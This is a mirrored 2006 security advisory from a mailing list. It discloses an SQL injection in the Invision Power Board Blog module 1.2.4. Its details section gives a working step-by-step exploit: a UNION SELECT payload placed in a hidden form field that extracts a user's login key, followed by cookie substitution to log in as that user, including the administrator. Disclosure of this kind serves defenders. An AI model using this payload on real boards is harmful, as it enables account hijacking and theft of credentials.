The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Invision Community Blog Mod 1.2.4 SQL Injection


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 21 Dec 2006 16:06:28 +0200
Subject: [UNIX] Invision Community Blog Mod 1.2.4 SQL Injection
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20061221142906.1F1675801@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Invision Community Blog Mod 1.2.4 SQL Injection
------------------------------------------------------------------------


SUMMARY

 <http://www.invisionboard.com/>; Invision Power Board (IPB) is "a 
professional forum system that has been built from the ground up with 
speed and security in mind, taking advantage of object oriented code, 
highly-optimized SQL queries, and the fast PHP engine. A comprehensive 
administration control panel is included to help you keep your board 
running smoothly. Moderators will also enjoy the full range of options 
available to them via built-in tools and moderators control panel. Members 
will appreciate the ability to subscribe to topics, send private messages, 
and perform a host of other options through the user control panel. It is 
used by millions of people over the world"

An SQL injection vulnerability found in Invision Power Board Blog module 
version 1.2.4 allows attackers to run SQL queries and obtain users 
passwords.

DETAILS

Exploit:
1. Open any blog entry
2. Try to reply to any message
3. Push "Preview message" button (Do not post your reply)
4. Save source code of opened page to your PC
5. Find this string <input type='hidden' name='eid' value='BLOG_ENTRY_ID' 
/>

6. Change BLOG_ENTRY_ID with this SQL Injection:
BLOG_ENTRY_ID UNION  SELECT b.entry_id,  b.blog_id, b.category_id, 
b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key, 
b.entry_category, b.entry, b.entry_status, b.entry_locked, 
b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, 
b.entry_last_comment_name, b.entry_last_comment_mid, 
b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, 
b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, 
b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, 
b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM 
ibf_members, ibf_blog_entries b WHERE id=USER_ID and 
b.entry_id=BLOG_ENTRY_ID LIMIT 1,1

USER_ID - ID of the user whom password you want to get (admin user id is 
1).

7. Push "Preview Button" again.
8. After refresh instead of blog entry name you will get users's HASH 
password.
9. Change your cookies in your favorite browser and open board. You will 
be automaticaly logged in as the user whom password you just got.


ADDITIONAL INFORMATION

The original article can be found at:  
<http://www.milw0rm.com/exploits/2877>; 
http://www.milw0rm.com/exploits/2877




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру